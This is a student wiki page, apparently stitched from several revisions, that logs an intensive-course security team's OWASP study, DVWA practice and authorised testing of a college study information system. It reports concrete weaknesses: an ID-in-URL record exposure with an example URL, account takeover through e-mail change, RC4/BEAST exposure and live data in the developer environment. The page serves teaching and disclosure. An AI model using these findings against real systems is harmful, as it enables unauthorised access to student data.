** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
Our final documentation can be found from Google Drive.
[https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit Final Documentation]

'''NB! This can be updated in a few hours or so?'''

==IP Feedback==
===Feedback from Sten Aus===
* '''What I did like: '''
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.
** Multicultural groups, where all the participants are from different countries.
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

* '''What I did not like: ''
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===
* '''What I did like:'''
** Everything was organized really well.
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.
** Everything was also free for us except the beer.
** I met many new interesting people and got to know about their cultures.
** I got new friends for life.
** Our project was interesting and i learned new skills.
** I also liked FREE water, Estonian girls and Americana pizza place.
** This IP was one of my best experiences ever.

* '''What I did not like:'''
** Lack of free time

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===
* '''What I did like:'''
** Accommodation
** The equipment we used
** The capabilities and expertise of the professors
** The overall quality of teaching
** The expected learning outcomes
** The activities besides the general course
** Friendly environment
** Working in teams. Thanks guys!
** Free water
** Tasty food

* '''What I did not like:'''
** To long working hours

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T09:03:28Z

Saus: /* Final documentation */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
Our final documentation can be found from Google Drive.
[https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit Final Documentation]

'''NB! This can be updated in a few hours or so?'''

==IP Feedback==
===Feedback from Sten Aus===
* '''What I did like: '''
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.
** Multicultural groups, where all the participants are from different countries.
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

* '''What I did not like: ''
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===
* '''What I did like:'''
** Everything was organized really well.
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.
** Everything was also free for us except the beer.
** I met many new interesting people and got to know about their cultures.
** I got new friends for life.
** Our project was interesting and i learned new skills.
** I also liked FREE water, Estonian girls and Americana pizza place.
** This IP was one of my best experiences ever.

* '''What I did not like:'''
** Lack of free time

===Feedback from Tomas Lepistö===
* '''What I did like:'''
** It was nice to meet new people and get new friends from different cultures.
** Also all the events that was arranged were very funny, specially sauna-event!
** Visiting Skype office was something that you don’t get to do everyday!
** Free food!
** Everything was well organized and teachers were truly interested about this intensive course!

* '''What I did not like:'''
** Too long studying/working days.

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===
* '''What I did like:'''
** Accommodation
** The equipment we used
** The capabilities and expertise of the professors
** The overall quality of teaching
** The expected learning outcomes
** The activities besides the general course
** Friendly environment
** Working in teams. Thanks guys!
** Free water
** Tasty food

* '''What I did not like:'''
** To long working hours

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T09:03:15Z

Saus: /* Final documentation */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
